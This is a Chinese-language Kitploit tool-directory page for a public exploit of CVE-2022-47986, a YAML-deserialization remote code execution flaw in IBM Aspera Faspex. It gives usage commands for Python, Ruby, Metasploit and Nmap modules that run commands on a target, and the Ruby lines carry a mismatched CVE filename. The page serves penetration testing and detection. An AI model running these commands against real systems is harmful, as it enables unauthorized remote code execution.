Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-47986 — CVE-2022-47986:利用该漏洞的 Python、Ruby、NMAP 和 Metasploit 模块。 | Kitploit
工具/GitHubGitHub/mauricelambert/cve-2022-47986
漏洞利用框架漏洞利用Web应用程序漏洞利用
GitHubmauricelambert/cve-2022-47986

CVE-2022-47986

CVE-2022-47986:利用该漏洞的 Python、Ruby、NMAP 和 Metasploit 模块。

查看仓库
2123年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-47986

为什么

该漏洞已在野外被利用。 IceFire 利用此漏洞在目标系统上部署勒索软件,我希望帮助 SOC/蓝队识别受影响系统,帮助渗透测试/红队利用并报告漏洞。

描述

我提供了纯 Python 和 Ruby 脚本、Metasploit 和 Nmap 模块,用于利用 IBM Aspera Faspex 中因 YAML 反序列化导致的 RCE(远程代码执行)漏洞。

利用:RCE(远程代码执行)

Python

root@kitploit:~
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id

Ruby

root@kitploit:~
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id

Metasploit

root@kitploit:~
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization 
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit

Nmap

root@kitploit:~
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2

来源

  • IBM
  • nvd.nist.gov
  • 博客 - 利用
  • thehackernews - icefire 利用
  • thehackernews - CISA KEV 目录

许可证

采用 GPL 3.0 版 许可。

下载工具